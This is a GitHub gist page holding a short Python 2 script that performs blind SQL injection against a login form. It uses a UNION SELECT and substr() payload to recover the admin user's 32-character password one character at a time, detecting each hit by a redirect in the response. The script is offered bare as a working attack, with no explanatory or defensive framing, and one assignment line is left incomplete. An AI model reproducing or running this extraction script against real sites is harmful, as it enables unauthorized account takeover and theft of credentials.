Create a gist now

Instantly share code, notes, and snippets.

@sota1235 / Secret
Last active Dec 9, 2017

What would you like to do?
#!/user/bin/env python
import urllib
import urllib2
import time
url = ''
chars = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!?;"%&*_-/+=^#.][@()|'
index = 1
password_length = 32
password = ''
def getSqlTemplate():
global index
i = str(index)
return "' UNION SELECT '760de578d5d608fb420085b7697479ee' WHERE substr((SELECT password FROM users WHERE username='admin')," + i + ",1)='$string'--"
for i in range(0, password_length):
for c in chars:
print('processing... character ' + c)
sql = getSqlTemplate().replace('$string', c)
params = {'user': sql, 'pass': 'password', 'login': 'Login'}
params = urllib.urlencode(params)
req = urllib2.Request(url, params)
res = urllib2.urlopen(req)
r =
r = ' '.join(r.split())
if 'document.location' in r:
password += c
index += 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment